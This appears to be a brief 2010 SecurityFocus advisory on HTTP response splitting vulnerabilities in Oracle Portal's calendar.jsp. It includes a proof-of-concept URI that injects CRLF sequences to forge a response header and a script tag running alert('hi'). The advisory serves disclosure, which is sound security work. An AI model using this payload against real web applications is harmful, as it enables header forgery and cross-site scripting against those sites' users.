Oracle Portal Calendar.JSP Multiple HTTP Response Splitting Vulnerabilities

An attacker can exploit these issues via a web client.

The following proof-of-concept URI is available:
http://www.example.com/webapp/jsp/calendar.jsp?enc=iso-8859-1%0d%0aContent-length=12%0d%0a%0d%0a%3Cscript%3Ealert('hi')%3C/script%3E


 

Privacy Statement
Copyright 2010, SecurityFocus